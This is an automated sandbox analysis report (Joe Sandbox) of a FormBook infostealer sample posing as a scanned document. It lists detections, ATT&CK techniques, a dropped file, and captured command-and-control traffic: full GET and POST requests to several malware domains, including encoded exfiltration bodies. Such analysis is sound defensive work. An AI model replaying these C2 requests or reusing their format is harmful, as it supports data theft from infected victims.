Loading ...

Play interactive tourEdit tour

Analysis Report SKMBT 25032020 Ref- 0000019.exe

Overview

General Information

Joe Sandbox Version:28.0.0 Lapis Lazuli
Analysis ID:218312
Start date:26.03.2020
Start time:18:56:29
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 19m 14s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:SKMBT 25032020 Ref- 0000019.exe
Cookbook file name:default.jbs
Analysis system description:Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113
Number of analysed new started processes analysed:23
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:2
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis stop reason:Timeout
Detection:MAL
Classification:mal100.troj.spyw.evad.winEXE@25/21@41/7
EGA Information:
  • Successful, ratio: 66.7%
HDC Information:
  • Successful, ratio: 50.3% (good quality ratio 47.3%)
  • Quality average: 70.5%
  • Quality standard deviation: 31%
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 201
  • Number of non-executed functions: 272
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
Warnings:
Show All
  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exe
  • Excluded IPs from analysis (whitelisted): 92.122.156.202, 205.185.216.10, 205.185.216.42, 93.184.221.240, 2.20.143.16, 2.20.143.23
  • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net
  • Execution Graph export aborted for target Cookies7n1p8js.exe, PID 5456 because it is empty
  • Execution Graph export aborted for target SKMBT 25032020 Ref- 0000019.exe, PID 4864 because it is empty
  • Report creation exceeded maximum time and may have missing disassembly code information.
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size getting too big, too many NtDeviceIoControlFile calls found.
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtProtectVirtualMemory calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook
malicious

Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification Spiderchart

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
Some HTTP requests failed (404). It is likely the sample will exhibit less behavior



Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through API1Registry Run Keys / Startup Folder1Process Injection712Software Packing23Credential Dumping1Security Software Discovery121Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery3Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery13Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingObfuscated Files or Information4Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceApplication Window Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection712Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Signature Overview

Click to jump to signature section


AV Detection:

barindex
Multi AV Scanner detection for domain / URLShow sources
Source: www.msdcong.comVirustotal: Detection: 7%Perma Link
Source: http://www.msdcong.com/pg/Virustotal: Detection: 7%Perma Link
Multi AV Scanner detection for dropped fileShow sources
Source: C:\Users\user\AppData\Local\Temp\Uchul\Cookies7n1p8js.exeVirustotal: Detection: 24%Perma Link
Multi AV Scanner detection for submitted fileShow sources
Source: SKMBT 25032020 Ref- 0000019.exeVirustotal: Detection: 24%Perma Link
Yara detected FormBookShow sources
Source: Yara matchFile source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara matchFile source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE
Antivirus or Machine Learning detection for unpacked fileShow sources
Source: 21.2.Cookies7n1p8js.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 21.1.Cookies7n1p8js.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 20.2.Cookies7n1p8js.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen

Spreading:

barindex
Enumerates the file systemShow sources
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)Show sources
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4x nop then pop edi5_2_00414068
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4x nop then pop edi5_2_0041511F
Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exeCode function: 4x nop then pop ebx5_2_0040546C
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 4x nop then pop edi21_2_00414068
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 4x nop then pop edi21_2_0041511F
Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exeCode function: 4x nop then pop ebx21_2_0040546C

Networking:

barindex
HTTP GET or POST without a user agentShow sources
Source: global trafficHTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1Host: www.frengeen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1Host: www.aalldxea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1Host: www.msdcong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1Host: www.wshlzhx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1Host: www.zcn4.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global trafficHTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
IP address seen in connection with other malwareShow sources
Source: Joe Sandbox ViewIP Address: 91.195.240.94 91.195.240.94
Internet Provider seen in connection with other malwareShow sources
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Source: Joe Sandbox ViewASN Name: unknown unknown
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 4e 32 67 4e 4e 76 70 36 49 52 41 6c 70 50 50 57 61 67 69 54 74 59 52 57 51 42 79 39 76 37 42 5a 6f 4b 4b 73 50 4a 34 34 77 67 49 6a 78 56 76 72 6b 4c 4b 55 43 69 30 54 41 4b 65 78 6f 59 56 75 41 36 70 36 4c 7a 4f 76 69 76 46 58 4c 6c 70 4b 32 70 38 6e 36 36 30 79 32 38 57 6e 6b 6d 5a 4a 54 38 7a 45 4d 58 45 32 42 72 43 69 77 41 49 7e 79 63 56 55 4c 4e 73 51 51 59 32 6f 4c 33 31 78 38 45 37 61 65 7e 67 43 5a 61 4b 43 2d 45 6d 39 4e 79 4f 6a 34 51 51 75 43 4c 54 64 77 52 58 30 53 34 78 7a 68 63 5a 4f 6f 58 41 4a 6d 42 35 42 45 32 47 55 74 71 6d 4b 63 43 63 54 54 39 6c 6b 4b 38 78 7e 42 45 35 67 72 6e 61 6c 4b 64 55 44 72 45 7a 30 69 61 72 62 70 68 4e 6a 48 54 52 73 59 46 73 57 75 6f 75 6e 39 69 56 55 6a 4f 45 31 52 62 41 70 34 41 50 5a 4e 6c 6c 55 63 32 41 6a 57 67 70 68 67 36 36 6c 4b 50 46 52 5a 7e 42 61 75 33 56 5a 41 55 61 41 74 32 32 79 6e 59 44 38 4c 45 63 36 42 6a 63 46 36 65 73 58 56 4f 68 6d 41 7e 4a 56 59 39 51 65 67 75 76 38 58 42 41 65 79 5a 49 4d 31 48 4e 43 45 6c 54 79 68 68 32 70 69 4c 35 57 30 55 30 43 35 54 35 73 76 4e 5a 35 67 4c 72 65 6d 33 79 37 68 4d 4f 51 30 72 4b 72 51 52 30 7a 48 74 48 35 58 49 43 79 46 6f 6c 4c 70 42 34 6d 49 66 2d 41 33 33 4a 66 5a 4e 50 57 7a 38 2d 67 5f 6c 4b 4a 79 42 77 6b 45 4c 75 7e 64 76 4d 56 66 75 6d 30 73 31 79 49 6d 4a 71 30 45 6e 7a 70 4b 64 61 57 43 43 76 55 56 76 43 78 54 6d 7a 33 2d 75 34 7a 56 77 4b 59 50 55 4f 72 78 4e 49 48 41 45 77 72 30 33 68 6d 5f 77 64 38 6f 70 57 59 54 6e 2d 7a 56 43 47 51 65 6f 48 6c 6b 41 67 73 4f 69 6b 74 53 49 44 6c 54 39 46 70 6a 74 4c 43 57 34 51 79 6b 51 34 32 36 75 4a 45 64 71 7a 6c 43 62 48 63 33 49 55 64 74 75 4a 4a 35 79 44 6d 36 35 69 45 55 33 65 51 6e 52 72 52 78 54 33 79 67 72 66 59 73 51 69 53 4e 67 69 37 54 76 7a 4a 6e 4e 6a 77 6b 35 69 41 70 61 51 39 39 57 42 30 67 65 6a 6e 4b 65 4d 6f 39 63 4e 68 4c 63 42 37 69 41 77 48 62 31 42 30 66 59 45 76 5f 55 46 70 69 59 6a 79 75 6c 59 41 66 43 76 50 61 79 58 53 44 78 75 72 6a 52 75 59 6a 4a 6d 74 58 7a 62 5a 41 6f 44 32 66 37 52 38 61 49 58 33 77 74 67 6e 73 52 44 42 55 4d 58 69 6b 4e 2d 57 70 74 35 35 49 67 4f 64 4b 41 35 33 35 4e 6c 65 6b 47 49 56 33 78 37 56 4a 4e 4a 77 45 6f 35 76 79 41 4e 62 76 55 72 56 37 57 68 48 56 73 30 66 37 68 57 67 70 5a 5a 58 4c 49 7a 44 30 61 34 4b 76 48 53 51 71 7a 32 7a 44 78 6b 77 42 7a 68 35 44 55 77 56 55 38 6c 6d 39 35 4e 70 79 4c 68 78 6b 6e 71 73 68 6e 57 76 6b 69 45 46 42 64 50 59 74 49 58 5a 51 6b 79 51 36 63 78 7a 74 6f 77 76 78 65 51 48 36 4f 64 4f 77 4d 5f 32 4f 73 6a 7a 52 77 37 73 4c 58 37 64 4f 6d 76 47 79 70 34 36 42 72 55 54 4b 47 75 74 41 77 48
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4d 63 78 4e 59 61 5a 46 58 69 78 6a 39 70 54 48 6f 75 71 53 78 53 76 5a 67 4b 4a 66 63 73 66 68 71 30 35 58 55 38 57 74 67 38 2d 71 62 4a 64 4f 33 56 54 57 33 39 48 73 61 7a 35 58 7a 70 44 7a 71 4a 73 45 34 47 34 4d 4e 34 78 4c 47 42 6d 77 43 31 50 47 33 64 62 69 50 38 37 50 51 4f 45 67 42 42 4a 57 39 64 2d 59 46 57 6d 6f 76 4f 30 6b 69 49 4d 6e 61 39 32 70 70 56 48 6b 4e 72 33 73 41 67 77 43 6e 6f 31 30 45 4e 5f 37 70 57 2d 69 42 6f 6c 47 76 47 67 4e 55 78 6d 62 75 41 6f 4c 33 30 45 6f 63 32 46 44 41 5a 52 79 37 4b 72 77 45 63 76 32 49 61 48 28 67 43 62 7a 72 4a 4c 6b 77 76 61 64 41 53 39 42 73 52 72 6d 38 5a 72 79 4e 52 6f 7a 54 38 5a 68 38 75 61 28 35 6f 68 7a 43 6b 4f 45 43 59 51 35 46 48 6b 6d 36 50 57 43 43 62 72 7e 64 39 41 69 73 52 68 47 41 6c 71 4f 77 48 33 48 77 6b 52 41 69 43 4d 51 4e 4e 4e 6f 69 69 57 77 2d 49 63 56 46 73 77 46 42 38 31 55 79 7a 38 5a 62 67 5f 61 51 6e 61 67 75 6e 4c 61 47 50 48 6b 6a 44 31 70 2d 36 6d 77 41 59 51 61 68 50 49 7a 4b 63 32 4c 42 51 49 6f 4f 52 6d 41 6c 45 48 53 34 64 62 79 6b 46 6c 30 57 41 4f 7e 4f 64 5f 75 43 38 6b 4d 6f 33 38 34 6f 56 4e 56 63 31 74 6c 51 57 64 6c 2d 7a 36 4d 62 39 4b 4c 62 41 51 4b 76 57 4c 34 49 46 56 4a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=ZizCWMcxNYaZFXixj9pTHouqSxSvZgKJfcsfhq05XU8Wtg8-qbJdO3VTW39Hsaz5XzpDzqJsE4G4MN4xLGBmwC1PG3dbiP87PQOEgBBJW9d-YFWmovO0kiIMna92ppVHkNr3sAgwCno10EN_7pW-iBolGvGgNUxmbuAoL30Eoc2FDAZRy7KrwEcv2IaH(gCbzrJLkwvadAS9BsRrm8ZryNRozT8Zh8ua(5ohzCkOECYQ5FHkm6PWCCbr~d9AisRhGAlqOwH3HwkRAiCMQNNNoiiWw-IcVFswFB81Uyz8Zbg_aQnagunLaGPHkjD1p-6mwAYQahPIzKc2LBQIoORmAlEHS4dbykFl0WAO~Od_uC8kMo384oVNVc1tlQWdl-z6Mb9KLbAQKvWL4IFVJg).
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4e 46 41 4c 2d 47 49 50 46 37 47 69 4b 49 44 66 72 75 6f 42 52 6d 7a 55 54 62 36 57 76 59 50 68 70 63 39 4f 48 30 69 6f 41 73 2d 73 64 39 61 47 33 56 53 51 33 39 41 6f 61 32 4f 49 7a 52 4c 7a 75 78 57 45 34 4f 5f 46 72 30 34 49 57 42 50 77 69 78 5a 45 33 4a 36 69 4e 34 53 65 7a 69 63 32 52 4e 4a 4a 39 46 34 54 48 75 48 68 4b 6d 37 6e 53 55 46 6c 61 56 6a 6f 65 6b 79 6a 65 57 59 6b 68 38 79 47 55 31 35 37 6b 39 62 33 65 71 78 73 78 38 6d 44 6f 4f 7a 49 7a 42 69 4c 37 30 61 45 54 6f 48 32 63 7e 44 54 54 41 73 30 50 53 53 31 55 4d 64 32 4c 36 78 32 32 69 4f 78 59 4e 54 6e 42 54 67 57 52 6e 37 4f 5f 35 6a 69 35 4d 62 7e 75 4a 48 38 32 34 34 79 38 43 44 79 62 42 6b 73 32 41 66 58 44 45 6d 7a 51 6a 59 67 72 62 65 4f 6a 4c 45 6d 75 63 57 74 76 70 35 42 43 70 59 52 41 48 4c 46 77 6b 56 4c 33 7e 6b 56 75 67 44 35 69 54 61 7a 39 5a 59 43 6c 41 4c 43 45 30 4c 4a 48 4f 4b 55 4b 59 6a 55 43 76 75 6d 36 66 41 4e 47 36 36 35 54 44 53 70 34 6e 71 77 41 59 63 61 6c 53 54 7a 2d 55 32 4b 54 59 62 34 39 4a 36 47 6c 45 67 51 49 4e 5a 35 7a 6b 39 30 57 59 4f 34 2d 4d 59 75 78 63 6b 62 4c 65 4f 37 4d 42 4e 55 4d 31 74 38 41 58 52 6b 4d 53 7a 4c 73 34 70 4d 72 42 71 4f 61 7a 6c 36 70 55 67 57 39 72 65 66 42 67 4c 59 54 44 6f 54 76 51 4a 37 55 4d 6d 6c 63 63 57 63 52 4b 73 69 51 43 75 53 63 30 42 43 61 6c 68 4e 73 61 59 51 31 73 54 32 2d 5a 4d 6f 7a 54 76 4b 7a 6c 67 4a 4d 56 6f 37 41 62 62 63 4c 37 65 57 6c 62 56 6a 42 32 46 55 64 6e 36 43 4e 56 4d 30 65 4b 6f 31 39 6e 39 78 4d 4d 65 51 58 73 35 61 31 4c 46 73 4b 4e 47 56 64 46 56 7e 79 33 52 39 79 63 50 42 76 39 75 7a 4f 58 32 41 35 36 44 6c 6e 4c 59 36 35 76 55 37 38 68 69 4e 6e 32 68 44 44 77 6e 54 77 37 79 4d 63 33 47 5a 69 57 49 46 5f 31 2d 59 6b 48 37 7e 44 74 58 32 30 41 77 37 48 43 63 35 6e 66 68 44 68 62 30 4e 4e 45 72 7a 5f 4a 47 38 64 6a 47 69 45 6c 51 33 34 4f 4d 37 59 4a 57 49 70 4b 46 57 49 49 36 4b 5a 32 34 4c 32 62 57 32 57 74 41 7e 31 68 66 49 67 67 53 43 41 6f 4e 47 74 50 4c 42 36 67 57 79 77 76 46 36 55 35 31 48 74 49 54 62 4d 47 71 54 78 50 50 4b 6e 61 44 30 6a 4f 45 66 46 4d 4a 46 74 28 36 76 67 56 52 7a 37 31 44 6a 4a 57 77 4f 76 61 70 57 6d 31 33 56 67 6d 4e 6c 46 47 49 7e 69 67 55 39 69 56 66 44 55 4c 4e 6f 69 30 39 64 69 6b 34 75 61 51 44 41 71 6c 48 74 77 52 5f 64 6e 59 32 33 5f 73 48 28 65 73 6c 72 73 68 35 6b 4f 54 6c 63 62 68 5f 57 79 73 48 76 30 73 4e 66 46 44 48 77 35 57 6b 28 50 4a 58 54 52 28 55 61 37 31 65 57 68 35 34 45 42 70 58 48 54 70 6d 50 51 4d 62 52 36 78 70 4d 34 66 7a 5a 53 32 2d 65 4a 6a 56 64 75 66 71 59 32 34 37 62 51 7a 66 71 43 30 5f 56 65 46 4d 67 58 6a 36
Source: global trafficHTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6a 6a 74 68 57 46 53 4e 59 32 5f 6b 52 38 57 38 65 6c 33 6a 4f 6e 65 78 6c 43 53 46 51 31 54 49 43 43 53 6d 64 69 49 57 66 68 6a 45 48 6f 4a 41 50 76 73 65 7a 6e 43 67 37 6d 47 52 63 41 62 6a 79 32 42 55 68 46 76 59 66 68 35 63 4c 70 65 71 6d 69 36 69 51 4d 37 50 72 6f 5f 51 44 4f 42 6f 48 6e 67 36 6d 44 34 55 44 7e 6b 38 38 49 55 52 47 52 34 69 4f 4e 78 67 55 36 38 68 52 38 6f 49 57 4e 2d 75 53 6b 66 62 6a 6c 6f 55 33 6f 68 52 39 4b 6e 45 58 6e 38 64 67 79 62 55 53 73 39 70 38 4a 6b 72 37 38 48 42 6d 6f 72 63 59 79 7a 4e 72 34 76 44 5f 69 79 7a 74 72 5a 5a 59 58 4d 57 4c 30 76 4a 2d 75 55 38 34 53 6c 76 4b 63 30 67 37 50 37 4d 4c 4e 73 44 35 34 7a 4f 66 43 67 59 5a 66 62 4b 70 5a 69 68 44 61 4f 32 48 6e 65 53 53 70 4a 52 61 64 58 6a 4a 28 43 73 71 79 62 52 46 58 53 43 51 43 4e 64 47 59 6e 67 36 78 63 4a 6d 56 79 4f 63 32 77 68 6b 66 51 49 31 4e 6e 73 6c 6b 6a 63 69 28 74 64 35 46 4c 34 62 4d 70 79 57 43 64 7a 4c 73 7a 57 65 49 2d 4a 54 6c 71 63 71 37 69 68 49 44 37 6a 54 77 35 77 71 6c 4d 6e 77 50 52 5a 61 79 49 67 45 6b 6c 4a 6f 61 79 43 7a 69 70 73 7a 6c 6c 37 5f 30 57 42 71 51 61 39 70 53 6a 4d 44 79 53 55 39 56 6d 44 67 4d 71 50 56 59 69 42 7a 54 74 55 39 61 45 66 67 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: 